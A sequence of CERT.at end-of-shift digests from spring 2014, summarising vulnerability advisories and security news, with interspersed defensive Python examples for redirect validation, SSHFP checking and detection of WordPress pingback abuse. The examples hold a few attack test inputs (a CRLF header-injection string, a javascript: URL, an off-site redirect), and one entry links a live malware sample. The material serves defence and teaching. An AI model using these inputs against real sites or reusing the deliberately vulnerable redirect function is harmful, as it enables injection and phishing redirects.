Huge file circulating online contains e-mail addresses, full message histories.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/B676MRE54C8/
*** IT Analyst Highlights 6 IT Security 'Worst Practices' ***
---------------------------------------------
In a new Network World article, prominent IT analyst and researcher Linda Musthaler is highlighting 6 'worst practices' that companies commit on their way to undermining, destabilizing, or just plain wrecking their IT security efforts: Failing to stay up-to-date with the latest technologies and techniques. Neglecting to take a comprehensive network security approach that also [...]
---------------------------------------------
http://www.seculert.com/blog/2014/04/it-analyst-highlights-6-it-security-wo…
*** HP integrated Lights Out (iLO) IPMI Protocol Flaw Lets Remote Users Obtain Hashed Passwords ***
---------------------------------------------
A vulnerability was reported in HP integrated Lights Out (iLO). A remote user can obtain hashed passwords.
A remote user can invoke the IPMI 2.0 protocol to obtain the target user's salted SHA1 or MD5 hash.
The vulnerability resides in the protocol design and is mandated by the IPMI 2.0 specification.
---------------------------------------------
http://www.securitytracker.com/id/1029981
*** Extended Random: The PHANTOM NSA-RSA backdoor that never was ***
---------------------------------------------
Prof's paper was all about attacking Dual EC DRBG, not a Snowden-esque spy bombshell. Over the last day or so the security press has been touting stories of a second NSA-induced backdoor in RSA's encryption software BSafe. But it appears to be more sound and fury than substance.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/04/02/extended_ra…
*** Safari for Mac OS X: update closes security holes and brings some new features ***
---------------------------------------------
The Apple web browser is available in new versions for OS X Mavericks and OS X Mountain Lion. In addition to patches for security vulnerabilities, there are bug fixes and changes to the notification feature.
---------------------------------------------
http://www.heise.de/security/meldung/Safari-fuer-Mac-OS-X-Update-schliesst-…
*** [2014-04-02] Multiple vulnerabilities in Rhythm File Manager ***
---------------------------------------------
An attacker being able to connect to the Android device (e.g. if he uses the same Wireless network), can access arbitrary local files from the device while the File Manager app is being used to stream media. Moreover, a malicious Android app or an attacker being able to connect to the Android device may issue system commands as the user "root" if "root browsing" is enabled.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Analysis: Financial cyber threats in 2013. Part 1: phishing ***
---------------------------------------------
It has been quite a few years since cybercriminals started actively stealing money from user accounts at online stores, e-payment systems and online banking systems.
---------------------------------------------
http://www.securelist.com/en/analysis/204792330/Financial_cyber_threats_in_…
*** Bugtraq: [IMF 2014] Call for Participation ***
---------------------------------------------
See the program at:
http://www.imf-conference.org/imf2014/program.html
The conference will take place from Monday, May 12th through Wednesday,
May 14th in Münster, Germany.
Registration details:
http://www.imf-conference.org/imf2014/registration.html
---------------------------------------------
http://www.securityfocus.com/archive/1/531707
*** VU#917700: Huawei Echo Life HG8247 optical router XSS vulnerability ***
---------------------------------------------
Vulnerability Note VU#917700: Huawei Echo Life HG8247 optical router XSS vulnerability
Original Release date: 02 Apr 2014 | Last revised: 02 Apr 2014
Overview: Huawei Echo Life HG8247 optical router contains a stored cross-site scripting (XSS) vulnerability.
Description: It has been reported that Huawei Echo Life HG8247 optical routers running software version V1R006C00S120 or earlier contain a stored cross-site scripting (XSS) vulnerability. An unauthenticated attacker can perform a stored
---------------------------------------------
http://www.kb.cert.org/vuls/id/917700
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 31-03-2014 18:00 − Dienstag 01-04-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Report: RSA endowed crypto product with second NSA-influenced code ***
---------------------------------------------
Extended Random like "dousing yourself with gasoline," professor warns.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/TbwAXYKTq34/
*** Old School Code Injection in an ATM .dll ***
---------------------------------------------
During our last ATM review engagement, we found some interesting executable files that were run by Windows Services under Local System account. These binaries had weak file permissions that allowed us to modify them using the standard ATM user account. As a proof of concept, I decided to inject some code into one of them to take full control of the system. This post is about the technique I used to inject the code into a .dll used by one of the Windows Services. I’m sure there are many
---------------------------------------------
http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/CRAp6jZhvVE/injecting-…
*** A Look at the GnuTLS X.509 Verification Code Flaw ***
---------------------------------------------
... it was found that the GnuTLS X.509 certificate verification code fails to properly handle certain error conditions that may occur during the certificate verification process. While verifying the certificate, GnuTLS would report it as successful verification of the certificate, even though verification should have resulted in a failure. This means that invalid certificates may be accepted as valid,
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/iSFhF7R9kFI/
*** Creating an intelligent “sandbox” for coordinated malware eradication ***
---------------------------------------------
Hello from China where I am presenting on coordinated malware eradication at the 2014 PC Security Labs Information Security Conference. Coordinated malware eradication was also the topic of my last blog. I said the antimalware ecosystem must begin to work with new types of partners if we are going to move from the current state of uncoordinated malware disruption, to a state of coordinated malware eradication.
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/03/31/creating-an-intelligent-…
*** It's not the breach that kills you, it's the cover-up ***
---------------------------------------------
It's how you handle yourself during and after a breach that will determine just how detrimental the breach actually is for your organization.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/Mi55LWhfA9c/
*** Managing Windows XP’s Risks in a Post-Support World ***
---------------------------------------------
There are now less than two weeks left until Microsoft terminates support for the incredibly long-lived Windows XP. Rarely has a tech product lasted as long as XP has – from XP’s launch on October 25, 2001 to its last Patch Tuesday on April 8, 2014 a total of 12 years, 5 months, and two […]
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/fSwrdK2qOeg/
*** EMC Cloud Tiering Appliance Request Validation Flaw Lets Remote Users View Files ***
---------------------------------------------
A vulnerability was reported in EMC Cloud Tiering Appliance. A remote user can view files on the target system.
The '/api/login' script does not properly validate user-supplied input. A remote user can supply a specially crafted XML External Entity (XXE) link to view files on the target system with root privileges.
---------------------------------------------
http://www.securitytracker.com/id/1029979
*** Grazer Linuxtage 2014: "Security on the Net" with free software ***
---------------------------------------------
The alternative software scene invites you to workshops and talks at FH-Joanneum
---------------------------------------------
http://derstandard.at/1395363812795
*** Horde webmail - Open Redirect Vulnerability ***
---------------------------------------------
An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation.
This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040004
*** ModSecurity HTTP Requests Chunked Encoding Security Bypass Vulnerability ***
---------------------------------------------
Martin Holst Swende has reported a vulnerability in ModSecurity, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to an error in the "modsecurity_tx_init()" function (apache2/modsecurity.c), which can be exploited to bypass the HTTP request body processing via a specially crafted request using chunked encoding.
---------------------------------------------
https://secunia.com/advisories/57444
*** ct-Special "Umstieg auf Linux" (Switching to Linux) available at the newsstand ***
---------------------------------------------
Switching to Linux, why not? Linux offers a lot of advantages, not only for XP users, who will soon no longer receive security fixes from Microsoft. The new special issue from the ct editorial team helps with a gentle switch from Windows to Linux.
---------------------------------------------
http://www.heise.de/newsticker/meldung/c-t-Special-Umstieg-auf-Linux-am-Kio…
*** IBM WebSphere Portal Two Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
Two vulnerabilities have been reported in IBM WebSphere Portal, which can be exploited by malicious people to conduct cross-site scripting attacks.
---------------------------------------------
https://secunia.com/advisories/57592
*** cPanel Multiple Vulnerabilities ***
---------------------------------------------
Two weaknesses, a security issue, and multiple vulnerabilities have been reported in cPanel, which can be exploited by malicious, local users to disclose potentially sensitive information and manipulate certain data, by malicious users to disclose potentially sensitive information, conduct script insertion attacks, manipulate certain data, and compromise a vulnerable system and by malicious people to conduct spoofing and cross-site scripting attacks and bypass certain security restrictions.
---------------------------------------------
https://secunia.com/advisories/57576
*** VU#893726: Zyxel P660 series modem/router denial of service vulnerability ***
---------------------------------------------
Zyxel P660 series modem/router contains a denial of service vulnerability when parsing a high volume of SYN packets on the web management interface.
---------------------------------------------
http://www.kb.cert.org/vuls/id/893726
*** Cisco Security Manager HTTP Header Redirection Vulnerability ***
---------------------------------------------
A vulnerability in the web framework of Cisco Security Manager could allow an unauthenticated, remote attacker to inject a crafted HTTP header which will cause a web page redirection to a possible malicious website.
The vulnerability is due to insufficient validation of user input before using it as an HTTP header value. An attacker could exploit this vulnerability by convincing a user to access a crafted URL.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco WSA HTTP Header Injection Vulnerability ***
---------------------------------------------
A vulnerability in the web framework of Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to inject a crafted HTTP header that could cause a web page redirection to a possible malicious website.
The vulnerability is due to insufficient validation of user input before using it as an HTTP header value. An attacker could exploit this vulnerability by persuading a user to access a crafted URL.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
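The unchecked redirect the Horde advisory describes and the header injection behind the two Cisco notices share one root cause: a user-supplied value reaching the Location header unvalidated. The following Python is an added example, not code from Horde, Cisco or the advisories; it shows the vulnerable pattern beside a hardened check, and the host name and sample targets are constructed.

```python
"""Validating a user-supplied redirect target before it reaches a header.

Added example (not from Horde, Cisco or the advisories). The vulnerable
function is the open-redirect pattern: parameter in, Location header out.
The hardened function keeps the redirect on-site and refuses CR/LF, which
is what turns a redirect parameter into HTTP header injection.
"""
from urllib.parse import urlsplit, urlunsplit

# Constructed: the host this application is served from.
OUR_HOST = "webmail.example.com"


def vulnerable_location_header(target: str) -> str:
    """Open redirect: the parameter value becomes the header unchanged."""
    return f"Location: {target}"


def safe_redirect_target(target: str, default: str = "/") -> str:
    """Return a site-relative redirect target, or `default` if unsafe.

    Rejected inputs:
      * control characters such as CR/LF (header injection, response splitting)
      * backslashes, which some browsers treat as path separators
      * schemes other than http(s), e.g. javascript:
      * absolute or protocol-relative URLs whose authority is not exactly
        OUR_HOST (this also refuses userinfo tricks like ours@evil and ports)
      * relative paths (resolved against the current page) and paths starting
        with "//", which browsers read as protocol-relative
    """
    if not target or any(ord(ch) < 0x20 or ch == "\x7f" for ch in target):
        return default
    if "\\" in target:
        return default
    parts = urlsplit(target)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return default
    if parts.netloc and parts.netloc.lower() != OUR_HOST:
        return default
    if not parts.netloc and not target.startswith("/"):
        return default
    if parts.path.startswith("//"):
        return default
    # Re-emit as path + query only, so no host ever reaches the header.
    return urlunsplit(("", "", parts.path or "/", parts.query, ""))


def safe_location_header(target: str) -> str:
    """Hardened counterpart of vulnerable_location_header."""
    return f"Location: {safe_redirect_target(target)}"


if __name__ == "__main__":
    for t in ["/mail/inbox?page=2", "//evil.example/login",
              "/inbox\r\nX-Injected: 1", "javascript:alert(1)"]:
        print(repr(t), "->", safe_location_header(t))
```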
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 28-03-2014 18:00 − Montag 31-03-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Siemens ROS Improper Input Validation ***
---------------------------------------------
Researcher Aivar Liimets from Martem Telecontrol Systems reported an improper input validation vulnerability in the Siemens Rugged Operating System (ROS), which could cause a denial-of-service (DoS) condition against the device's management web interface. Siemens coordinated the vulnerability details with NCCIC/ICS-CERT and has provided information for mitigation of the vulnerability. This vulnerability can be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-087-01
*** WiFi Bug Plagues Philips Internet-Enabled TVs ***
---------------------------------------------
Some versions of Philips internet-enabled SmartTVs are vulnerable to cookie theft and an array of other tricks that abuse a lax WiFi setting.
---------------------------------------------
http://threatpost.com/wifi-bug-plagues-philips-internet-enabled-tvs/105119
*** VulDB: Adobe Reader 11.0.06 sandbox elevated privileges ***
---------------------------------------------
The vulnerability was published on 28.03.2014 by VUPEN via Pwn2Own 2014. The vulnerability has been tracked as CVE-2014-0512 since 20.12.2013. It is difficult to exploit. The attack can be carried out over the network. No specific authentication is required for exploitation. No technical details are known, but a private exploit for the vulnerability is known.
---------------------------------------------
http://www.scip.ch/?vuldb.12723
*** Adobe Flash Player Bugs Let Remote Users Execute Arbitrary Code ***
---------------------------------------------
A remote user can create specially crafted content that, when loaded by the target user on a Windows-based system, will trigger a use-after-free and execute arbitrary code on the target system [CVE-2014-0506]. The code will run with the privileges of the target user.
VUPEN reported this vulnerability (via Pwn2Own at CanSecWest 2014).
A remote user can create specially crafted content that, when loaded by the target user, will trigger a heap overflow and execute arbitrary code on the target system [CVE-2014-0510]. The code will run with the privileges of the target user.
Zeguang Zhao and Liang Chen reported this vulnerability (via Pwn2Own at CanSecWest 2014).
---------------------------------------------
http://www.securitytracker.com/id/1029969
---------------------------------------------
(Note: as far as we have been able to determine so far, no exploits for this have turned up "in the wild" yet.)
---------------------------------------------
*** nginx 1.4.6/1.5.11 Heap-based buffer overflow in the SPDY ***
---------------------------------------------
A bug in the experimental SPDY implementation in nginx was found, which
might allow an attacker to cause a heap memory buffer overflow in a
worker process by using a specially crafted request, potentially
resulting in arbitrary code execution (CVE-2014-0133).
The problem affects nginx 1.3.15 - 1.5.11, compiled with the
ngx_http_spdy_module module (which is not compiled by default) and
without --with-debug configure option, if the "spdy" option of the
"listen" directive is used in a configuration file.
The problem is fixed in nginx 1.5.12, 1.4.7.
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030250
*** Chip.de forum apparently hacked: 2.5 million user records affected ***
---------------------------------------------
Forum members were informed of the hack by e-mail; passwords were also insufficiently protected.
---------------------------------------------
http://derstandard.at/1395363600546
*** Who's Behind the "BLS Weblearn" Credit Card Scam? ***
---------------------------------------------
A new rash of credit and debit card scams involving bogus sub-$15 charges and attributed to a company called "BLS Weblearn" is part of a prolific international scheme designed to fleece unwary consumers. This post delves deeper into the history and identity of the credit card processing network that has been enabling this type of activity for years.
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/MxEDIVQPC94/
*** More Device Malware: This is why your DVR attacked my Synology Disk Station, (Mon, Mar 31st) ***
---------------------------------------------
Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1] ). Today, we were able to recover the malware responsible. You can download the malware here https://isc.sans.edu/diaryimages/hikvision.zip (password: infected) . The malware resides in /dev/cmd.so . A number of additional suspect files were located in the /dev directory which we still need to recover / analyze from the
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17879&rss
*** Crack team of cyber warriors arrives to SAVE UK from grid-crippling HACK ATTACKS ***
---------------------------------------------
National CERT goes live today. The UK is finally getting a national Computer Emergency Response Team (CERT), with the delayed launch of the organisation taking place today.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/03/31/cert_uk_lau…
*** Cisco Security Response Team Opens Its Toolbox ***
---------------------------------------------
With a variety of security tools, CSIRT is able to detect and analyze malicious traffic throughout the network, including virus propagation, targeted attacks, and commonplace exploits. Because CSIRT continually identifies new security threats, the team needs some historical look-back at what occurred on the network. They also need a solution that can dissect the finer details of security incidents while facing the ever-present restrictions with data storage.
---------------------------------------------
https://blogs.cisco.com/security/cisco-security-response-team-opens-its-too…
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 27-03-2014 18:00 − Freitag 28-03-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** New PGP keys ***
---------------------------------------------
At CERT.at we had to phase out some old 1024 bit DSA keys as well as create new master-signing keys. This turned out to be a major effort. Key roll-overs are never easy. In order to ease the key roll-over pains, we created a key transition document. This document is signed by the old keys in order to prove authorship. ...
---------------------------------------------
http://www.cert.at/services/blog/20140328155445-1086.html
*** NTP Amplification, SYN Floods Drive Up DDoS Attack Volumes ***
---------------------------------------------
The potency of distributed denial of service attacks has increased steadily but dramatically over the last 14 months.
---------------------------------------------
http://threatpost.com/ntp-amplification-syn-floods-drive-up-ddos-attack-vol…
*** Schneider Electric Serial Modbus Driver Buffer Overflow ***
---------------------------------------------
OVERVIEW Carsten Eiram of Risk-Based Security has identified a stack-based buffer overflow vulnerability in Schneider Electric’s Serial Modbus Driver that affects 11 Schneider Electric products. Schneider Electric has produced patches that mitigate this vulnerability. This vulnerability can be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-086-01
*** Apple Credential Phishing via appleidconfirm.net, (Thu, Mar 27th) ***
---------------------------------------------
ISC user Craig Cox wrote in alerting us of a fairly sophisticated phishing campaign that is currently in progress. The website appleidconfirm.net has a seemingly realistic Apple login page that is being sent out by email. The site even includes JavaScript code which validates your Apple ID as an email in an attempt to obtain only valid credentials. Upon submitting what it considers valid credentials, you're redirected to the /?2 page of the site which contains another form which appears to
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17869&rss
*** SonicWALL Email Security Input Validation Flaw in 'License Management' and 'Advanced' Pages Permits Cross-Site Scripting Attacks ***
---------------------------------------------
A vulnerability was reported in SonicWALL Email Security. A remote user can conduct cross-site scripting attacks.
The 'License Management' and 'Advanced' pages do not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser.
---------------------------------------------
http://www.securitytracker.com/id/1029965
*** Word and Excel Files Infected Using Windows PowerShell ***
---------------------------------------------
Malware targeting Word and Excel files has been around for some time, but we recently encountered a new malware family, CRIGENT (also known as “Power Worm”) which brings several new techniques to the table. (We detect these files as W97M_CRIGENT.JER and X97M_CRIGENT.A.) Most significantly, instead of creating or including executable code, CRIGENT uses the Windows PowerShell
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/9hUmCpAOj9M/
*** OpenSSH 6.6 bypass SSHFP DNS RR checking by HostCertificate ***
---------------------------------------------
I've been looking at handling host keys better, and tripped over this bug. Essentially, if the server offers a HostCertificate that the client doesn't accept, then the client doesn't then check for SSHFP records.
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030239
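The bug report above says the client skips the SSHFP lookup once it has rejected a host certificate. What that lookup would have done is below, as an added example that is not OpenSSH code: the fingerprint in an SSHFP record is the SHA-1 or SHA-256 digest of the raw public key blob (the base64 field of a known_hosts or ssh-keyscan line), and the client accepts the key only if one published record matches. The ssh-ed25519 key used here is a constructed 32-byte dummy with a valid wire encoding, not a real key, and the DNS records are generated from it rather than looked up.

```python
import base64
import hashlib
import struct

# SSHFP RR algorithm and fingerprint-type numbers (RFC 4255, RFC 6594, RFC 7479).
SSHFP_ALGORITHM = {
    "ssh-rsa": 1,
    "ssh-dss": 2,
    "ecdsa-sha2-nistp256": 3,
    "ecdsa-sha2-nistp384": 3,
    "ecdsa-sha2-nistp521": 3,
    "ssh-ed25519": 4,
}
SSHFP_FPTYPE = {1: hashlib.sha1, 2: hashlib.sha256}


def parse_hostkey_line(line):
    """Parse "<host> <keytype> <base64 blob> [comment]" as found in known_hosts / ssh-keyscan output."""
    _, keytype, b64 = line.split()[:3]
    blob = base64.b64decode(b64)
    # The wire-format blob begins with a length-prefixed copy of the key type;
    # reject a line whose two type fields disagree.
    (n,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + n] != keytype.encode():
        raise ValueError("key type mismatch in host key line")
    return keytype, blob


def expected_sshfp(keytype, blob):
    """All (algorithm, fptype, hex fingerprint) tuples that DNS could legitimately carry for this key."""
    algo = SSHFP_ALGORITHM[keytype]
    return {(algo, fptype, h(blob).hexdigest()) for fptype, h in SSHFP_FPTYPE.items()}


def parse_sshfp_rr(rr):
    """Parse a presentation-format record such as "host.example. IN SSHFP 4 2 <hex>"."""
    fields = rr.split()
    i = fields.index("SSHFP")
    return int(fields[i + 1]), int(fields[i + 2]), fields[i + 3].lower()


def verify_hostkey(hostkey_line, sshfp_rrs):
    """True only if at least one published SSHFP record matches the key the server offered."""
    keytype, blob = parse_hostkey_line(hostkey_line)
    published = {parse_sshfp_rr(rr) for rr in sshfp_rrs}
    return bool(expected_sshfp(keytype, blob) & published)


def make_sshfp_rrs(owner, hostkey_line):
    """Records to publish for a host key (the zone-file lines `ssh-keygen -r` would emit)."""
    keytype, blob = parse_hostkey_line(hostkey_line)
    return ["%s IN SSHFP %d %d %s" % (owner, a, t, fp)
            for a, t, fp in sorted(expected_sshfp(keytype, blob))]


def _fake_ed25519_line(host, seed):
    """Constructed sample: a correctly framed ssh-ed25519 blob around a made-up 32-byte key."""
    key = bytes((seed + i) & 0xFF for i in range(32))
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + key
    return "%s ssh-ed25519 %s" % (host, base64.b64encode(blob).decode())


GOOD_LINE = _fake_ed25519_line("bastion.example", 0)
ROGUE_LINE = _fake_ed25519_line("bastion.example", 100)   # what a man-in-the-middle would offer
DNS_RRS = make_sshfp_rrs("bastion.example.", GOOD_LINE)   # stands in for a DNSSEC-validated answer

if __name__ == "__main__":
    print(verify_hostkey(GOOD_LINE, DNS_RRS))   # True
    print(verify_hostkey(ROGUE_LINE, DNS_RRS))  # False
```

The check is only as trustworthy as the DNS answer, so a real client must insist on a DNSSEC-validated (AD) response before treating a match as authentication; that is the part the reported bug short-circuits, since the client never gets as far as asking.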
*** [2014-03-28] Multiple vulnerabilities in Symantec LiveUpdate Administrator ***
---------------------------------------------
Attackers are able to compromise Symantec LiveUpdate Administrator at the application and database levels because of vulnerable password reset functionality and SQL injection vulnerabilities. This enables access to credentials of update servers on the network without prior authentication.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Python "os._get_masked_mode()" Race Condition Security Issue ***
---------------------------------------------
A security issue has been reported in Python, which can be exploited by malicious, local users to potentially disclose or manipulate certain data.
The security issue is caused due to a race condition within the "os._get_masked_mode()" function (Lib/os.py), which can be exploited to cause certain application-created files to be world-accessible.
The security issue is reported in versions 3.4, 3.3, and 3.2.
---------------------------------------------
https://secunia.com/advisories/57672
*** IBM Security Bulletin: IBM Operational Decision Manager and WebSphere ILOG JRules: Multiple security vulnerabilities in IBM JRE ***
---------------------------------------------
This Security Bulletin addresses the security vulnerabilities that have shipped with the IBM Java Runtime Environment (JRE) included in IBM Operational Decision Manager and IBM ILOG JRules. IBM ODM and ILOG JRules now include the most recent version of the IBM JRE which fixes the security vulnerabilities reported in Oracles Critical Patch Update releases of January 2014. CVE(s): CVE-2014-0423, CVE-2014-0416 and CVE-2014-0411 Affected product(s) and affected version(s): IBM WebSphere ILOG
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** Cisco IOS Software High Priority Queue Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability in the packet driver code of Cisco IOS Software could allow an unauthenticated, remote attacker to cause a reload of the affected device, resulting in a denial of service (DoS) condition.
CVE-2014-2131
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 26-03-2014 18:00 − Donnerstag 27-03-2014 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Allied Telesis AT-RG634A ADSL router unauthenticated webshell ***
---------------------------------------------
Risk: High, Allied Telesis AT-RG634A ADSL Broadband router hidden administrative unauthenticated webshell ..
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030221
*** HP Multiple StoreOnce Products Unauthorised Access Security Bypass Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/57601
*** Linux Kernel ath9k "ath_tx_aggr_sleep()" Race Condition Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/57468
*** When ZOMBIES attack: DDoS traffic triples as 20Gbps becomes the new normal ***
---------------------------------------------
Junk traffic mostly floods in from botnets. DDoS traffic has more than trebled since the start of 2013, according to a new study released on Thursday that fingers zombie networks as the primary source of junk traffic that can be used to flood websites.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/03/27/ddos_trends…
*** DSA-2885-1 libyaml-libyaml-perl -- security update ***
---------------------------------------------
Ivan Fratric of the Google Security Team discovered a heap-based buffer overflow vulnerability in LibYAML, a fast YAML 1.1 parser and emitter library. A remote attacker could provide a specially-crafted YAML document that, when parsed by an application using libyaml, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
---------------------------------------------
https://www.debian.org/security/2014/dsa-2885
*** Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication ***
---------------------------------------------
Cisco released its semiannual Cisco IOS Software Security Advisory Bundled Publication on March 26, 2014. In direct response to customer feedback, Cisco releases bundles of Cisco IOS Software Security Advisories on the fourth Wednesday of the month in March and September of each calendar year. The publication includes 5 Security Advisories that address vulnerabilities in Cisco IOS Software and 1 Security Advisory that addresses ..
---------------------------------------------
http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_mar14.html
*** Malware Hijacks Android Mobile Devices to Mine Cryptocurrency ***
---------------------------------------------
Several bits of malware targeting Android mobile devices hijack the smartphone or tablets resources to mine digital currency such as Litecoin or Dogecoin.
---------------------------------------------
http://threatpost.com/malware-hijacks-android-mobile-devices-to-mine-crypto…
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 25-03-2014 18:00 − Mittwoch 26-03-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** A few updates on "The Moon" worm, (Tue, Mar 25th) ***
---------------------------------------------
It has been over a month since we saw the "Moon" worm first exploiting various Linksys routers. I think it is time for a quick update to summarize some of the things we learned since then: Much of what we found so far comes thanks to the malware analysis done by Bernardo Rodrigues. Bernardo used QEMU to run the code in a virtual environment. QEMU is as far as I know the only widely available virtualization technique that can simulate a MIPS CPU while running on an x86 host.
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17855&rss
*** WordPress pingback function abused for DDoS attacks ***
---------------------------------------------
24 March 2014
In recent days there have been numerous media reports about DDoS attacks that abuse the XML-RPC pingback function of WordPress. Below I list some of these articles as further reading for those affected and interested. Blog post by Daniel Cid of the security provider Sucuri explaining how the attack works. It also describes
---------------------------------------------
http://www.cert.at/services/blog/20140324230619-1079.html
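Both sides of the pingback abuse leave recognisable traces in ordinary web server logs: a site being used as a reflector sees bursts of POST requests to /xmlrpc.php, and the victim sees GET requests from many unrelated WordPress installations whose User-Agent announces "verifying pingback from <IP>". The detector below is an added example (not from the CERT.at post or any of the articles it lists) that runs over combined-format log lines; the log lines are constructed for the example, and the pingback User-Agent pattern is the one WordPress sends when it fetches the claimed source page.

```python
import re
from collections import Counter

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# User-Agent WordPress uses when it fetches the pingback's claimed source page.
PINGBACK_UA_RE = re.compile(
    r"^WordPress/(?P<ver>[\d.]+); (?P<blog>https?://[^;]+); verifying pingback from (?P<origin>\S+)$"
)


def analyse(lines, threshold=3):
    """Summarise pingback-reflection indicators in a batch of access log lines.

    victim side:    GETs carrying the pingback-verification User-Agent, one per abused blog;
    reflector side: POSTs to /xmlrpc.php, counted per client IP.
    """
    victim_hits = []
    xmlrpc_posts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue                       # not combined format; skip rather than guess
        rec = m.groupdict()
        ua = PINGBACK_UA_RE.match(rec["ua"])
        if ua:
            victim_hits.append((rec["ip"], ua["blog"], ua["origin"], rec["path"]))
        elif rec["method"] == "POST" and rec["path"].split("?", 1)[0].endswith("/xmlrpc.php"):
            xmlrpc_posts[rec["ip"]] += 1
    reflectors = {blog for _, blog, _, _ in victim_hits}
    return {
        "pingback_fetches": len(victim_hits),
        "distinct_reflectors": len(reflectors),
        "claimed_origins": sorted({origin for _, _, origin, _ in victim_hits}),
        # many different blogs all "verifying" pingbacks against us at once = we are the target
        "being_reflected": len(reflectors) >= threshold,
        # one client hammering our xmlrpc.php = we are being used as a reflector
        "xmlrpc_abusers": {ip: n for ip, n in xmlrpc_posts.items() if n >= threshold},
    }


# Constructed sample log. The random query strings on the victim-side GETs mirror what the
# attack used to defeat the victim's page cache; the origin IP is whatever the attacker put
# in the pingback call, so it is a claim, not evidence.
SAMPLE_LOG = [
    '203.0.113.10 - - [24/Mar/2014:10:01:02 +0100] "GET /?8531207=1029384 HTTP/1.0" 200 51234 "-" "WordPress/3.8.1; http://blog-a.example; verifying pingback from 198.51.100.7"',
    '203.0.113.11 - - [24/Mar/2014:10:01:02 +0100] "GET /?4412099=7781200 HTTP/1.0" 200 51234 "-" "WordPress/3.7.1; http://blog-b.example; verifying pingback from 198.51.100.7"',
    '203.0.113.12 - - [24/Mar/2014:10:01:03 +0100] "GET /?9900121=3321001 HTTP/1.0" 200 51234 "-" "WordPress/3.8; http://blog-c.example; verifying pingback from 198.51.100.7"',
    '203.0.113.13 - - [24/Mar/2014:10:01:03 +0100] "GET /?1200456=6540098 HTTP/1.0" 200 51234 "-" "WordPress/3.8.1; http://blog-d.example; verifying pingback from 198.51.100.8"',
    '192.0.2.5 - - [24/Mar/2014:10:01:04 +0100] "GET /about/ HTTP/1.1" 200 8211 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/28.0"',
    '198.51.100.9 - - [24/Mar/2014:10:02:00 +0100] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '198.51.100.9 - - [24/Mar/2014:10:02:00 +0100] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '198.51.100.9 - - [24/Mar/2014:10:02:01 +0100] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '198.51.100.9 - - [24/Mar/2014:10:02:01 +0100] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
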